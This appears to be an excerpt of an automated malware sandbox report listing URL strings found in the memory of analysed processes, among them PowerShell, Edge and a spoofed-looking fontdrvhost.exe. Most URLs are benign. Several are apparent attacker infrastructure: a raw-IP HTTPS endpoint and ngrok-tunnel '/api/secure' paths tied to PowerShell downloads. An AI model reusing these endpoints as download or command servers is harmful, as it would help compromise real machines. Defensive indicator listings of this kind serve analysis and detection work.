                      Source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2711323212.0000000004450000.00000004.00001000.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0
                      Source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2711323212.0000000004450000.00000004.00001000.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                      Source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2711323212.0000000004450000.00000004.00001000.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://uc1b3e73e669a72d85958bcbe13a.dl.dropboxusercontent.com
                      Source: powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://uc4dbae793261c4ce4dfc5ef2aef.dl.dropboxusercontent.com
                      Source: powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ucf68a874ab5d88bea64660fe73d.dl.dropboxusercontent.com
                      Source: powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www-env.dropbox-dns.com
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97C07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111B12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.dropbox.com
                      Source: powershell.exe, 00000003.00000002.2390109279.000001DAAFC62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                      Source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2711323212.00000000045F1000.00000004.00001000.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000000.2494954160.00000000005A5000.00000002.00000001.01000000.0000000F.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2709744411.00000000005A5000.00000002.00000001.01000000.0000000F.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000000.2655015622.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
                      Source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2711323212.0000000004450000.00000004.00001000.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.symauth.com/cps0(
                      Source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2711323212.0000000004450000.00000004.00001000.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.symauth.com/rpa00
                      Source: fontdrvhost.exeString found in binary or memory: https://104.161.43.18:2845/7e56fc199c7194d0/g5rgxmg9.bkfop
                      Source: fontdrvhost.exe, 0000001B.00000003.2788101014.00000000059A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://104.161.43.18:2845/7e56fc199c7194d0/g5rgxmg9.bkfopkernelbasentdllkernel32GetProcessMitigatio
                      Source: fontdrvhost.exe, 0000001B.00000002.2789038269.000000000327C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://104.161.43.18:2845/7e56fc199c7194d0/g5rgxmg9.bkfopx
                      Source: powershell.exe, 00000013.00000002.2533952315.000002011226D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://23glcrtmzxqgwfpq3oujitt.n
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97C07000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111FCB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA979E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97C07000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2382295699.000001DAAFAA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/f08a7638d48ba191b651003837c0a34d
                      Source: powershell.exe, 00000003.00000002.2354311529.000001DA95A00000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2354857200.000001DA95C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2354249803.000001DA959F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2354585063.000001DA95AFB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2390109279.000001DAAFC62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/f08a7638d48ba191b651003837c0a34d-UseBasicPars
                      Source: powershell.exe, 00000013.00000002.2531867358.000002010ED66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/metadata/f08a7638d48ba191b651003837c0a34d
                      Source: powershell.exe, 00000013.00000002.2533952315.0000020111032000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/metadata/f08a7638d48ba191b651003837c0a34dX
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://a.sprig.com/
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/gsi/client
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA979E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020110BCE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020110BBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA98E4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA9962A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA99991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA9996B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA98E4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA99991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.login.yahoo.com/
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.hellofax.com/
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.hellosign.com/
                      Source: msedge.exe, 00000015.00000002.2419974554.000001B9E16AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com963
                      Source: msedge.exe, 00000006.00000002.2326261445.00000207DE2A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comse
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://canny.io/sdk.js
                      Source: powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cfl.dropboxstatic.com/static/
                      Source: msedge.exe, 00000006.00000002.2328122443.0000288402220000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2421498290.00001D540017C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                      Source: msedge.exe, 00000006.00000002.2328122443.0000288402220000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2421498290.00001D540017C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/
                      Source: msedge.exe, 00000006.00000002.2328150462.0000288402240000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2420799528.00001D5400040000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
                      Source: fontdrvhost.exe, 0000001B.00000003.2716818817.0000000003A6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudflare-dns.com/dns-query
                      Source: fontdrvhost.exe, 0000001B.00000003.2716818817.0000000003A6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudflare-dns.com/dns-queryPOSTContent-TypeContent-LengthHostapplication/dns-message%dMachi
                      Source: powershell.exe, 00000003.00000002.2378546799.000001DAA7A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000003.00000002.2378546799.000001DAA7A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000003.00000002.2378546799.000001DAA7A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2711323212.0000000004450000.00000004.00001000.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                      Source: 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 00000019.00000002.2711323212.0000000004450000.00000004.00001000.00020000.00000000.sdmp, 678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe, 0000001A.00000002.2681519347.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl-web.dropbox.com/
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/fsip/
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/fsip/
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/fsip/
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/document/fsip/
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/presentation/fsip/
                      Source: powershell.exe, 00000003.00000002.2355291636.000001DA97DFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97D8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2355291636.000001DA97DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111A0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111964000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.00000201119AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.000002011198D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2533952315.0000020111991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/spreadsheets/fsip/
